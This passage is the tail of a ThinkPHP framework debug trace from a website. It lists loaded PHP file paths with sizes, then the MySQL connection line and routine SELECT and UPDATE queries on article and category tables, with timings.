  95. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/Domain.php ( 2.53 KB )
  96. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/RuleGroup.php ( 22.43 KB )
  97. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/Rule.php ( 26.95 KB )
  98. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/RuleItem.php ( 9.78 KB )
  99. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/route/app.php ( 1.72 KB )
  100. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/facade/Route.php ( 4.70 KB )
  101. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/dispatch/Controller.php ( 4.74 KB )
  102. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/Dispatch.php ( 10.44 KB )
  103. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/controller/Index.php ( 4.81 KB )
  104. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/BaseController.php ( 2.05 KB )
  105. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/facade/Db.php ( 0.93 KB )
  106. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/connector/Mysql.php ( 5.44 KB )
  107. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/PDOConnection.php ( 52.47 KB )
  108. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/Connection.php ( 8.39 KB )
  109. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/ConnectionInterface.php ( 4.57 KB )
  110. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/builder/Mysql.php ( 16.58 KB )
  111. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/Builder.php ( 24.06 KB )
  112. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/BaseBuilder.php ( 27.50 KB )
  113. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/Query.php ( 15.71 KB )
  114. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/BaseQuery.php ( 45.13 KB )
  115. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/TimeFieldQuery.php ( 7.43 KB )
  116. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/AggregateQuery.php ( 3.26 KB )
  117. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/ModelRelationQuery.php ( 20.07 KB )
  118. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/ParamsBind.php ( 3.66 KB )
  119. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/ResultOperation.php ( 7.01 KB )
  120. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/WhereQuery.php ( 19.37 KB )
  121. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/JoinAndViewQuery.php ( 7.11 KB )
  122. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/TableFieldInfo.php ( 2.63 KB )
  123. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/Transaction.php ( 2.77 KB )
  124. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/log/driver/File.php ( 5.96 KB )
  125. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/contract/LogHandlerInterface.php ( 0.86 KB )
  126. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/log/Channel.php ( 3.89 KB )
  127. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/event/LogRecord.php ( 1.02 KB )
  128. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-helper/src/Collection.php ( 16.47 KB )
  129. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/facade/View.php ( 1.70 KB )
  130. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/View.php ( 4.39 KB )
  131. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Response.php ( 8.81 KB )
  132. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/response/View.php ( 3.29 KB )
  133. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Cookie.php ( 6.06 KB )
  134. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-view/src/Think.php ( 8.38 KB )
  135. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/contract/TemplateHandlerInterface.php ( 1.60 KB )
  136. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-template/src/Template.php ( 46.61 KB )
  137. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-template/src/template/driver/File.php ( 2.41 KB )
  138. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-template/src/template/contract/DriverInterface.php ( 0.86 KB )
  139. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/runtime/temp/067d451b9a0c665040f3f1bdd3293d68.php ( 11.98 KB )
  140. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-trace/src/Html.php ( 4.42 KB )
  1. CONNECT:[ UseTime:0.000438s ] mysql:host=127.0.0.1;port=3306;dbname=f_mffb;charset=utf8mb4
  2. SHOW FULL COLUMNS FROM `fenlei` [ RunTime:0.000666s ]
  3. SELECT * FROM `fenlei` WHERE `fid` = 0 [ RunTime:0.000362s ]
  4. SELECT * FROM `fenlei` WHERE `fid` = 63 [ RunTime:0.000292s ]
  5. SHOW FULL COLUMNS FROM `set` [ RunTime:0.000485s ]
  6. SELECT * FROM `set` [ RunTime:0.009629s ]
  7. SHOW FULL COLUMNS FROM `article` [ RunTime:0.000613s ]
  8. SELECT * FROM `article` WHERE `id` = 484912 LIMIT 1 [ RunTime:0.002299s ]
  9. UPDATE `article` SET `lasttime` = 1776642296 WHERE `id` = 484912 [ RunTime:0.008590s ]
  10. SELECT * FROM `fenlei` WHERE `id` = 67 LIMIT 1 [ RunTime:0.000278s ]
  11. SELECT * FROM `article` WHERE `id` < 484912 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000539s ]
  12. SELECT * FROM `article` WHERE `id` > 484912 ORDER BY `id` ASC LIMIT 1 [ RunTime:0.000856s ]
  13. SELECT * FROM `article` WHERE `id` < 484912 ORDER BY `id` DESC LIMIT 10 [ RunTime:0.008024s ]
  14. SELECT * FROM `article` WHERE `id` < 484912 ORDER BY `id` DESC LIMIT 10,10 [ RunTime:0.004002s ]
  15. SELECT * FROM `article` WHERE `id` < 484912 ORDER BY `id` DESC LIMIT 20,10 [ RunTime:0.003449s ]
0.127447s